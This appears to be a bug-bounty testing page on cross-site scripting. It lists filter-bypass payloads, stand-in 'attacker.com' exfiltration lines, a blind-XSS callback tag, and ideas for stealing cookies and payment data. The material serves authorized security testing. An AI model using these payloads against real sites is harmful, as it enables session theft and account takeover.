XSS Testing

Cross-site scripting is high-frequency, chains well with CSRF and IDOR, and is worth testing on every input.

1. Test basic HTML injection – can you input <h2>, <img>, <table> without filtering?
2. Check encoding – reflected as <script> or %3Cscript%3E? Test double encoding: %253C, %26lt;
3. Reverse engineer the filter – blocking complete tags only? Try unclosed tag: <script src=attacker.com?c= - Test blacklist gaps: <svg>, <%00iframe>, on%0derror, </script/x>, <ScRiPt> - Test every reflected parameter for both reflected and blind XSS - Check WAF behavior – sometimes they only filter parameter values not names ===== Filter Bypass Flow ===== - How are non-malicious HTML tags handled? <h2>, <b> - What about incomplete tags? <iframe src=attacker.com/c=
4. How do they handle encodings? <%00h2>, %0d, %0a, %09
5. Is it a blacklist of hardcoded strings? Does </script/x> work? <ScRiPt>?
6. Does the blacklist apply to file uploads too?

<svg onload=alert(1)>
<img src=x onerror=alert(1)>
<ScRiPt>alert(1)</ScRiPt>
<%00script>alert(1)</script>
</script/x><script>alert(1)</script>
<iframe src=//attacker.com/c=

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//%0D%0A
" onclick=alert(1)//<button ' onclick=alert(1)//>

• CSS customization fields (themes, profile colors)
• Event/meeting name fields
• Third-party integrations (Facebook import, OAuth name fields)
• JSON POST body values
• File upload filenames: photo.jpg<svg onload=confirm()>
• SWF parameters: onload, allowedDomain, movieplayer, xmlPath, callback
• Fake/injected parameters: ''?realparam=1&foo=bar'+alert(/XSS/)+'
• Custom error pages
• Mobile app signup – different codebase, different filtering

Use a blind XSS payload that calls back to your server (XSS Hunter, interactsh):

"><script src=https://yourxsshunter.xss.ht></script>

Test in:

• Support ticket fields
• Admin-visible fields (name, bio, feedback)
• Log-visible fields (User-Agent, Referer, X-Forwarded-For)

• Chain with CSRF to perform state-changing actions from victim's browser
• Steal session cookies if HttpOnly is not set
• Use XSS to exfiltrate payment info from the DOM
• Use XSS + no second confirmation for email/password change = account takeover
• Self-XSS + CSRF = stored XSS affecting other users

• TBHM XSS
• CSRF Testing
• Bug Chaining & Escalation
• Methodology Index